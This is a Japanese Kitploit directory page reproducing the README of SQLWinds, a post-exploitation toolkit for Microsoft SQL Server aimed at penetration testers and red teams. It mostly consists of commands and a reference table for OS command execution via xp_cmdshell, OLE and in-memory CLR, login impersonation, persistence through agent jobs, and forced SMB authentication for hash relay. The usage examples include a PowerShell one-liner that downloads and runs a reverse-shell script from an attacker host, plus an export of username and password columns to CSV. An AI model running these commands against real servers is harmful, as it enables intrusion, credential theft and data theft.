Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
sqlwinds — SQLWinds - SQL Server セキュリティ評価 & ポストエクスプロイテーションツールキット | Kitploit
ツール/GitHubGitHub/blue0x1/sqlwinds
特権昇格永続化メカニズムエクスプロイト横移動構成監査データ流出ポストエクスプロイトペネトレーションテストレッドチーミングデータベースセキュリティ
GitHubblue0x1/sqlwinds

sqlwinds

11ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

SQLWinds - SQL Server セキュリティ評価 & ポストエクスプロイテーションツールキット

リポジトリを見る

SQLWinds

SQLセキュリティ評価&ポストエクスプロイテーションツールキット

SQLWinds は、Microsoft SQL Server のセキュリティテストと悪用のためのコマンドラインツールです。サーバーの詳細な分析、権限昇格、攻撃の実行、ネットワークを介したピボットを実現する対話型環境を提供し、インメモリコード実行や SCCM データベース探索などのタスクに特化したコマンドを備えています。


SQLWinds


📖 ドキュメントとリソース

Wiki Issues Releases

クイックリンク:

  • 完全なドキュメント&Wiki - 完全な使用ガイドとコマンドリファレンス
  • 問題を報告 - バグを見つけた、または機能リクエストがありますか?
  • 最新リリース - 最新バージョンをダウンロード

機能

  • 多様な認証方式: SQL、Windows 統合 (--integrated)、Kerberos 委任 (--user/--pass を指定した --kerberos) に対応。
  • 包括的な列挙:
    • サーバー情報、データベース、テーブル、列、ユーザー、権限。
    • セキュリティ構成監査 (xp_cmdshell、CLR、OLE など)。
    • 機密データの検出とシークレットの抽出。
    • リンクサーバーの列挙と悪用。
  • ポストエクスプロイテーションと水平展開:
    • コード実行: xp_cmdshell、OLE Automation Procedures (sp_oacreate)、CLR 統合を有効化して使用。
    • インメモリ CLR: ディスクにファイルを書き込まずに、.NET アセンブリをメモリから直接読み込んで実行 (:memclr)。
    • 資格情報の窃取: リレー攻撃のために UNC パスへの SMB 認証を強制 (:unc_smb)。
    • レジストリ操作: xp_regread を使用してレジストリのキーと値を読み取り。
    • 永続化: SQL エージェントジョブの作成、一覧表示、実行。
    • データの外部送信: ファイルのアップロード/ダウンロードと、クエリ結果の CSV/JSON へのエクスポート。
  • SCCM データベース連携: (対象データベースが SCCM の場合)
    • SCCM を検出し、バージョン/サイト情報を報告。
    • ハードウェア、ソフトウェア、コレクション、展開のインベントリ。
    • SCCM 固有のセキュリティ監査の実行。
  • Kerberos 分析: 対象に関連付けられた SPN を Active Directory で確認し、Kerberos 認証のトラブルシューティングを行います。
  • インスタンス検出: ドメイン上で利用可能な SQL Server インスタンスを列挙します。
  • 高度な REPL: オートコンプリートとコマンド履歴を備えた対話型環境。

インストールとコンパイル

クイックビルド

リポジトリには、Windows での簡単なコンパイルのための build.bat スクリプトが含まれています。

root@kitploit:~
.\build.bat

コンパイルされた SQLWinds.exe 実行ファイルは bin\Release\ ディレクトリに配置されます。

手動ビルド

  1. .NET Framework (≥ 4.6.1) または .NET SDK がインストールされていることを確認します。
  2. リポジトリをクローンします:
    root@kitploit:~
    git clone https://github.com/blue0x1/sqlwinds.git
    cd sqlwinds
    
  3. ソリューションをコンパイルします:
    root@kitploit:~
    msbuild SQLWinds.sln /p:Configuration=Release
    

使用方法

基本接続

root@kitploit:~
# SQL Authentication
SQLWinds.exe --server TARGET\\INSTANCE --user sa --pass Password123

# Windows Authentication (Current User Context)
SQLWinds.exe --server sql01.corp.local --integrated

# Kerberos Delegation (with provided credentials)
SQLWinds.exe --server sql01.prod.corp.local --kerberos --user CORP\\svc_sql --pass SvcPass123!

# Connect and run a single command
SQLWinds.exe --server 10.0.0.5 --user sa --pass pass --run-cmd "SELECT name FROM sys.databases"

一般的なコマンドラインオプション

対話型 REPL モード

root@kitploit:~
sqlwinds> :info
sqlwinds> :dbs
sqlwinds> :users
sqlwinds> :enable_xp_cmdshell
sqlwinds> :xp whoami
sqlwinds> :spn
sqlwinds> help

REPL コマンド完全リファレンス

例: 大きなスクリプトに :plain を使用する

:plain コマンドは、大きな複数行の SQL スクリプトを実行するために不可欠です。

root@kitploit:~
sqlwinds> :plain
SQL> 
SQL> BEGIN TRY
.....>     SELECT * FROM [VeryImportantTable];
.....>     EXEC sp_configure 'show advanced options', 1;
.....>     RECONFIGURE;
.....> END TRY
.....> BEGIN CATCH
.....>     SELECT ERROR_MESSAGE();
.....> END CATCH
.....> :execute
  1. :plain と入力して Enter を押します。
  2. 完全な SQL スクリプトを貼り付けるか入力します。
  3. 新しい行に :execute と入力するとスクリプト全体が実行され、:cancel と入力すると中断されます。

使用例

1. 監査

root@kitploit:~
SQLWinds.exe --server dc01 --integrated --security-audit 

2. xp_cmdshell を利用したコード実行

root@kitploit:~
SQLWinds.exe --server 192.168.1.15 --user sa --pass pass --enable-xp-cmdshell
# In the REPL that opens:
sqlwinds> :xp whoami /all
sqlwinds> :xp powershell -ep bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://10.10.15.10/revshell.ps1')"

3. インメモリ CLR 実行 (ファイルレス)

root@kitploit:~
# Compile your .NET assembly to a DLL (e.g., CommandExecutor.dll)
sqlwinds> :enable_clr
sqlwinds> :memclr "C:\Tools\CommandExecutor.dll" "CommandExecutor.Class1" "Exec" "whoami"

4. SRelay による NetNTLMv2 ハッシュの窃取

root@kitploit:~
# On your machine: sudo responder -I tun0
sqlwinds> :unc_smb \\10.10.15.10\fake_share

5. SCCM データベースの悪用

root@kitploit:~
SQLWinds.exe --server sccmdb.corp.local --integrated
sqlwinds> :sccm_info
sqlwinds> :sccm_collections
sqlwinds> :sccm_application "Microsoft 365"

6. データの外部送信

root@kitploit:~
# Export sensitive data to CSV
sqlwinds> :exportcsv "SELECT username, password FROM users" credentials.csv

# Download a file stored in the database
sqlwinds> :download "SELECT file_data FROM documents WHERE id=1" secret.docx

🤝 コントリビューションとサポート

コントリビューションを歓迎します!改善のアイデアや問題を見つけた場合は、次の手順に従ってください:

  1. ドキュメントについて Wiki を確認
  2. 重複を避けるため、既存の Issues を検索
  3. 提案やバグ報告の詳細情報を含む新しい Issue を作成

⚠️ 免責事項

このツールは、許可されたセキュリティテストおよび教育目的のみを意図しています。所有していない、または明示的なテスト許可を得ていないシステムへの不正使用は違法です。開発者は一切の責任を負わず、このプログラムによって引き起こされた誤用や損害についても責任を負いません。


クレジット

blue0x1 によって開発されました。

ツールをダウンロード
オプション説明
--server対象サーバー (IP、ホスト名、インスタンス)。必須。
--user, --passSQL または Windows 認証の資格情報。
--integrated認証に現在の Windows トークンを使用します。
--kerberosKerberos 認証フローを使用します。
--spn-check対象ホストの SPN を AD で確認します。
--run-cmd "<SQL>"単一の SQL コマンドを実行して終了します。
--run-file file.sqlファイルから SQL スクリプトを実行して終了します。
--info広範なサーバー情報を収集して表示します。
--getinstanceドメイン内の SQL インスタンスを検出して終了します。
--list-dbsデータベースを一覧表示して終了します。
--security-auditセキュリティ監査を実行して終了します。
コマンド説明例
:info詳細なサーバー情報を表示:info
:dbsすべてのデータベースを詳細付きで一覧表示:dbs
:tables [db] [schema]データベース/スキーマ内のテーブルを一覧表示:tables master dbo
:columns <table> [schema] [db]テーブルの列を一覧表示:columns Users dbo MyDatabase
:usersすべての SQL ログインとデータベースユーザーを一覧表示:users
:perms現在のユーザー権限を表示:perms
:auditセキュリティ構成監査を実行:audit
:search [term]機密データを検索:search password
:secrets潜在的なシークレットを抽出:secrets
:servicesSQL Server サービスのアカウントを表示:services
:spn対象ホストの SPN を確認:spn
:enable_xp_cmdshellxp_cmdshell を有効化:enable_xp_cmdshell
:disable_xp_cmdshellxp_cmdshell を無効化:disable_xp_cmdshell
:xp <command>xp_cmdshell 経由で OS コマンドを実行:xp whoami
:enable_oleOLE Automation を有効化:enable_ole
:disable_oleOLE Automation を無効化:disable_ole
:ole_cmd <command>OLE 経由で OS コマンドを実行:ole_cmd "calc.exe"
:enable_clrCLR 統合を有効化:enable_clr
:disable_clrCLR 統合を無効化:disable_clr
:deploy-clr <path>ファイルから CLR アセンブリを配置:deploy-clr C:\Tools\cmd.dll
:list-assemblies配置された CLR アセンブリを一覧表示:list-assemblies
:clr_execCLR メソッドを実行:clr_exec MyAssembly MyClass Method arg1
:memclrCLR アセンブリをメモリから実行:memclr "C:\Tools\exec.dll" "Namespace.Class" "Method" "arg"
:remove-assembly <name>CLR アセンブリを削除:remove-assembly MyAssembly
:list_linkserversリンクサーバーを一覧表示:list_linkservers
:linkrpc <srv> <cmd>リンクサーバー経由でコマンドを実行:linkrpc LINKEDSRV "whoami"
:impersonate <login>SQL ログインを偽装:impersonate sa
:revertセキュリティコンテキストを元に戻す:revert
:agent_jobSQL エージェントジョブを管理:agent_job create MyJob "whoami"
:ls [path]SQL 経由でディレクトリを一覧表示:ls C:\Windows\Temp
:unc_smb <path>UNC への SMB 認証を強制:unc_smb \\192.168.1.100\share
:plain大きな SQL スクリプトを貼り付け(下記の例を参照)
:regreadレジストリ値を読み取り:regread HKEY_LOCAL_MACHINE Software\Microsoft value
:regread_allキー内のすべての値を一覧表示:regread_all HKEY_LOCAL_MACHINE Software\Microsoft
:uploadファイルをテーブルにアップロード:upload C:\file.txt MyTable
:downloadクエリからバイナリをダウンロード:download "SELECT file FROM blobs" out.bin
:exportcsvクエリを CSV にエクスポート:exportcsv "SELECT * FROM users" out.csv
:exportjsonクエリを JSON にエクスポート:exportjson "SELECT * FROM users" out.json
:sccm_infoSCCM データベースを検出:sccm_info
:sccm_inventorySCCM インベントリを表示:sccm_inventory
:sccm_collectionsSCCM コレクションを一覧表示:sccm_collections "All Systems"
:sccm_deployments展開を表示:sccm_deployments
:sccm_clientsクライアントを一覧表示:sccm_clients inactive
:sccm_auditSCCM セキュリティ監査:sccm_audit
:sccm_applicationアプリの詳細を表示:sccm_application "Google Chrome"
helpヘルプを表示help
exitREPL を終了exit